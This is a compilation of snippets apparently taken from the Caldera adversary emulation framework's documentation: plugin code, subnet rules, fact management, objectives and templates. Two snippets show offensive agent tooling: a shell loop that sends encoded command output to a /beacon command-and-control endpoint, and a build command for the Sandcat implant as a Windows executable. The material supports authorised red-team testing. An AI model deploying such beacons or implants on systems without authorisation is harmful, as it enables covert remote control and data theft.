app.router.add_route('GET', '/get/abilities', fetcher.get_abilities) class AbilityFetcher: def __init__(self, services): self.services = services self.auth_svc = services.get('auth_svc') async def get_abilities(self, request): abilities = await self.services.get('data_svc').locate('abilities') return web.json_response(dict(abilities=[a.display for a in abilities])) @check_authorization @template('abilities.html') async def splash(self, request): abilities = await self.services.get('data_svc').locate('abilities') return(dict(abilities=[a.display for a in abilities])) ``` -------------------------------- ### Subnet Rule Configuration Example in Caldera Source: https://caldera.readthedocs.io/en/latest/Basic-Usage Illustrates how to use rules to restrict operations to specific IP subnet ranges. This is useful for ensuring that actions are confined to authorized network segments. ```yaml - action: DENY fact: my.host.ip match: .* - action: ALLOW fact: my.host.ip match: 10.245.112.0/24 ``` -------------------------------- ### Managing Facts with the Caldera Knowledge Service (Python) Source: https://caldera.readthedocs.io/en/latest/_sources/How-to-Build-Planners Demonstrates how to interact with the Knowledge Service to manage facts. This includes adding, deleting, retrieving, and updating facts, as well as determining the origin of a fact. Requires instantiation of `Fact` objects. ```python knowledge_svc = BaseService.get_service('knowledge_svc') knowledge_svc.add_fact(fact_object) knowledge_svc.delete_fact(criteria_dict) knowledge_svc.get_facts(criteria_dict) knowledge_svc.update_fact(criteria_dict, updates_dict) knowledge_svc.get_fact_origin(fact_identifier_or_object) ``` -------------------------------- ### Execute Agent Instructions and Report Results (Shell) Source: https://caldera.readthedocs.io/en/latest/How-to-Build-Agents This snippet demonstrates how to loop through agent instructions, execute commands, base64 encode the results, and POST them to the /beacon endpoint. It includes pausing execution based on the provided sleep time. ```shell data=$(echo '{"paw":"$paw","results":[{"id":$id, "output":$output, "stderr":$stderr, "exit_code":$exit_code, "status": $status, "pid":$pid}]}' | base64) curl -s -X POST -d $data localhost:8888/beacon sleep $instruction_sleep ``` -------------------------------- ### Compile Sandcat Agent with .exe Extension (Windows - Shell) Source: https://caldera.readthedocs.io/en/latest/How-to-Build-Agents This command compiles the Sandcat agent for Windows, specifically outputting a file with a .exe extension. It sets the operating system to Windows and applies linker flags for a smaller binary. ```shell GOOS=windows go build -o ../payloads/sandcat.exe -ldflags="-s -w" sandcat.go ``` -------------------------------- ### Define Objective in YAML Source: https://caldera.readthedocs.io/en/latest/_sources/Objectives This YAML defines a Caldera Objective, including its ID, name, description, and a list of Goals. Objectives are collections of fact targets used to guide adversary operations. ```yaml id: 7ac9ef07-defa-4d09-87c0-2719868efbb5 name: testing description: This is a test objective that is satisfied if it finds a user with a username of 'test' goals: - count: 1 operator: '=' target: host.user.name value: 'test' ``` -------------------------------- ### HTML Template for Abilities Display Source: https://caldera.readthedocs.io/en/latest/_sources/How-to-Build-Plugins This HTML template uses Jinja2 syntax to dynamically display a list of abilities. It includes basic styling and a mechanism to close the section. It's designed to be rendered by a web framework like aiohttp-jinja2. ```html
{{ a }}